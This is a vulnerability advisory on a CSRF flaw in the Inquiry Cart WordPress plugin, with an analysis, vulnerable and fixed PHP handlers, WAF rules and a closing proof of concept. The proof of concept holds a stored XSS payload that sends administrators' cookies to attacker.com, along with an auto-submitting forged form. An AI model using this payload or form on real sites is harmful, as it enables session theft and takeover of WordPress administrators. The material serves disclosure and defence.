Atomic Edge analysis of CVE-2026-4090 (metadata-based):
This is a Cross-Site Request Forgery (CSRF) vulnerability in the Inquiry Cart plugin for WordPress, affecting all versions up to and including 3.4.2. The vulnerability exists in the rd_ic_settings_page function, which handles settings form submissions without proper nonce verification. An unauthenticated attacker can trick a logged-in administrator into performing an unwanted action, leading to modification of plugin settings and potential stored cross-site scripting (XSS) in the admin area. The CVSS score is 6.1 (Medium), with a vector indicating network attack vector, low attack complexity, no privileges required, user interaction required, and a scope change.
The root cause is the absence of nonce validation in the rd_ic_settings_page function. In WordPress, settings forms should include a nonce field (created by wp_nonce_field) and the processing function should verify it with check_admin_referer or wp_verify_nonce. Based on the CWE classification (352) and the description, Atomic Edge analysis infers that the function processes $_POST data directly without calling check_admin_referer('plugin-settings-action') or similar. This is a confirmed CSRF pattern; no code diff is available but the description explicitly states "missing nonce verification."
Exploitation requires an attacker to craft a malicious HTML page or link that submits a forged POST request to the WordPress admin area. The target endpoint is likely /wp-admin/options-general.php?page=rd_ic_settings or a similar admin page for the Inquiry Cart plugin. The attacker can set plugin options such as enabling/disabling features, but more critically, can inject malicious JavaScript into fields that are later displayed in the admin interface (stored XSS). The forged request passes the intended administrator authorization check because the browser attaches the administrator's session cookies, so the request appears to come from an authenticated session. The attack vector requires social engineering: the attacker must convince an administrator to click a link or visit a page while logged into WordPress.
Remediation requires the plugin developer to add nonce verification to the rd_ic_settings_page function. The fix should use check_admin_referer('rd_ic_settings') or wp_verify_nonce($_POST['_wpnonce'], 'rd_ic_settings') before processing any $_POST data. Additionally, output should be escaped with esc_html or wp_kses to prevent stored XSS. Since no patched version is available, sites using this plugin should consider disabling it or implementing a virtual patch via a Web Application Firewall (WAF) to block requests to the vulnerable endpoint without a valid nonce.
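A settings handler in the shape the advisory infers for rd_ic_settings_page, as an added example (not the plugin's code), showing the missing-nonce pattern from the root-cause paragraph beside the remediation just described; the option name rd_ic_custom_css and the nonce action 'rd_ic_settings' are assumptions.

```php
<?php
// Added illustration (not the plugin's code): a settings handler shaped like
// the rd_ic_settings_page function in the advisory, first in the vulnerable
// form and then hardened. The option name rd_ic_custom_css and the nonce
// action 'rd_ic_settings' are assumptions.

// BEFORE: accepts any POST reaching the page, so a cross-site form submitted by
// a logged-in admin's browser is saved (CWE-352), and the saved value is echoed
// back unescaped (stored XSS in wp-admin).
function rd_ic_settings_page_vulnerable() {
    if ( isset( $_POST['rd_ic_custom_css'] ) ) {
        update_option( 'rd_ic_custom_css', $_POST['rd_ic_custom_css'] );
    }
    echo '<form method="post"><textarea name="rd_ic_custom_css">'
        . get_option( 'rd_ic_custom_css', '' )
        . '</textarea><input type="submit" value="Save"></form>';
}

// AFTER: capability check, a nonce bound to this form, sanitised input and
// escaped output. check_admin_referer() calls wp_die() when _wpnonce is absent
// or fails wp_verify_nonce(), so a forged request never reaches update_option().
function rd_ic_settings_page_fixed() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    if ( isset( $_POST['rd_ic_custom_css'] ) ) {
        // Verifies the _wpnonce field (and the referer) for action 'rd_ic_settings'.
        check_admin_referer( 'rd_ic_settings' );
        // Persist plain CSS text only: strip tags so no markup is stored.
        $css = wp_strip_all_tags( wp_unslash( $_POST['rd_ic_custom_css'] ) );
        update_option( 'rd_ic_custom_css', $css );
    }
    echo '<form method="post">';
    // Emits the hidden _wpnonce and _wp_http_referer fields the check expects.
    wp_nonce_field( 'rd_ic_settings' );
    echo '<textarea name="rd_ic_custom_css">'
        . esc_textarea( get_option( 'rd_ic_custom_css', '' ) )
        . '</textarea><input type="submit" value="Save"></form>';
}
```

The nonce is tied to the logged-in user's session token and a time window, so a page on another origin cannot produce one; the attacker's form in the proof of concept below would be rejected by the hardened handler before any option is written.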
The impact includes unauthorized modification of plugin settings, which may break site functionality or introduce security weaknesses. More critically, the ability to inject malicious scripts (stored XSS) into the admin area allows an attacker to execute arbitrary JavaScript in the context of any administrator who visits the settings page. This can lead to session hijacking, credential theft, or further privilege escalation by creating new administrator users or installing malicious plugins. The stored XSS is persistent, meaning every subsequent admin user who accesses the settings page will be affected.
Below is our ModSecurity-compatible rule set for this particular CVE. The rules block POST requests to the plugin's settings page that carry no _wpnonce field or an empty one; a WAF cannot validate the nonce value itself, since it is bound to the administrator's session and a time window, so the rules complement the code fix rather than replace it.
# Rule 20264090: settings POST whose _wpnonce field is present but empty.
# Metadata and disruptive actions belong on the chain starter only; the
# chained rules carry just their operator (and t:none).
SecRule REQUEST_URI "@contains /wp-admin/options-general.php" "id:20264090,phase:2,deny,status:403,chain,msg:'CVE-2026-4090 - Inquiry Cart CSRF - Missing nonce in settings form',severity:'CRITICAL',tag:'CVE-2026-4090'"
    SecRule ARGS:page "@streq inquiry-cart-settings" "chain"
        SecRule REQUEST_METHOD "@streq POST" "chain"
            SecRule ARGS_POST:_wpnonce "@rx ^$" "t:none"
# Rule 20264091: settings POST with no _wpnonce field at all (&VAR counts occurrences).
SecRule REQUEST_URI "@contains /wp-admin/options-general.php" "id:20264091,phase:2,deny,status:403,chain,msg:'CVE-2026-4090 - Inquiry Cart CSRF - No nonce provided',severity:'CRITICAL',tag:'CVE-2026-4090'"
    SecRule ARGS:page "@streq inquiry-cart-settings" "chain"
        SecRule REQUEST_METHOD "@streq POST" "chain"
            SecRule &ARGS_POST:_wpnonce "@eq 0" "t:none"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-4090 - Inquiry cart <= 3.4.2 - Cross-Site Request Forgery via Settings Form
// This proof-of-concept demonstrates how an attacker can forge a request to update
// plugin settings and inject a stored XSS payload in the admin area.
// Assumptions:
// - The vulnerable endpoint is /wp-admin/options-general.php?page=inquiry-cart-settings
// (derived from plugin slug 'inquiry-cart' and typical WordPress settings page pattern).
// - The form processes POST parameters like 'rd_ic_custom_css' or similar settings fields.
// - No nonce check is performed before updating options.
$target_url = 'http://example.com/wp-admin/options-general.php?page=inquiry-cart-settings';
// Stored XSS payload: injects a script that steals admin cookies or creates admin user
$payload = '<script>new Image().src="http://attacker.com/steal?c="+document.cookie;</script>';
$post_data = array(
    'rd_ic_custom_css'    => $payload, // This field is displayed in admin without escaping
    'rd_ic_other_setting' => '1',
    'option_page'         => 'inquiry-cart-settings',
    'action'              => 'update',
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIE, 'wordpress_logged_in_hash=valid_admin_session;'); // Requires admin session
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
// The attacker would typically host an HTML page that auto-submits this form
// via JavaScript or a simple <form> with action pointing to the target.
// The following demonstrates the direct HTTP request (requires admin cookie).
$response = curl_exec($ch);
if (curl_errno($ch)) {
    echo 'cURL error: ' . curl_error($ch) . PHP_EOL;
} else {
    echo 'Request sent. Check if settings were updated.' . PHP_EOL;
}
curl_close($ch);
// Alternative: CSRF form that an admin would be tricked into submitting
// (This is more realistic because the attacker does not have the admin cookie)
echo '--- CSRF Form (host this on attacker site) ---' . PHP_EOL;
echo '<html><body>' . PHP_EOL;
echo '<form action="' . $target_url . '" method="POST">' . PHP_EOL;
echo '<input type="hidden" name="rd_ic_custom_css" value="' . htmlspecialchars($payload, ENT_QUOTES) . '">' . PHP_EOL;
echo '<input type="hidden" name="option_page" value="inquiry-cart-settings">' . PHP_EOL;
echo '<input type="hidden" name="action" value="update">' . PHP_EOL;
echo '<input type="submit" value="Click me">' . PHP_EOL;
echo '</form>' . PHP_EOL;
echo '<script>document.forms[0].submit();</script>' . PHP_EOL;
echo '</body></html>' . PHP_EOL;